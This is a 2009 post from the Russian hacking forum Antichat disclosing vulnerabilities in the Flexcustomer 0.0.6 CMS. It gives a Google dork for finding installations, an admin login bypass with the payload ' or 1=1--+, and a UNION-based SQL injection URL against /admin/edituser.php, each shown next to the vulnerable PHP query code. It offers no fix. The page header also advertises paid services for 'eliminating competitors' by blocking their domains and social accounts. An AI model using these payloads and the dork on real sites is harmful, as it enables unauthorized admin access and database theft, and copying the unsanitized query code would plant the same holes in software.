Форум АНТИЧАТ - Уязвимости Flexcustomer

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Уязвимости Flexcustomer

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимости Flexcustomer

02.06.2009, 09:17

Iceangel_

Members of Antichat - Level 5

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

Уязвимости Flexcustomer

Уязвимости Flexcustomer 0.0.6 (возможно уязвимы и более ранние версии)

download: http://www.china-on-site.com/flexcust/flexcusten.zip

dork: "Powered by Flexcustomer"

1) [bypass] (требования: magic_quotes=off)
не заметил, бага в паблике, но для следующей уязвимости она понадобится...
admin/usercheck.php
уязвимый код:

PHP код:


		
			
if (!empty($logincheck)){

$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";

эксплуатирование:

Код:

login:' or 1=1--+

2) [SQL-injection] (требования: magic_quotes=off, доступ в админ панель)

/admin/edituser.php

уязвимый код:

PHP код:


		
			
<?php

$userinfo = $db->getuserinfobyid($cid);

/CustomSql.inc

PHP код:


		
			
   function getuserinfobyid($customerid)

   {      

      $sql = "select * from customer where customerid='$customerid'";

      $result = $this->select($sql);

      return $result;

   }

эксплуатирование:
/admin/edituser.php?cid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+

Последний раз редактировалось Iceangel_; 02.06.2009 в 09:34..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Переполнение буфера в Kaspersky Anti-Virus	bul666	Мировые новости	9	15.08.2009 15:08
63% web-сайтов содержат опасные уязвимости	Suicide	Мировые новости	4	24.05.2009 21:51
В Windows Mobile найдено две уязвимости	ground_zero	Мировые новости	1	06.02.2007 11:40
Множественные уязвимости в INVISION POWER BOARD 2.1.x	GreenBear	Уязвимости	6	02.03.2006 21:36

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход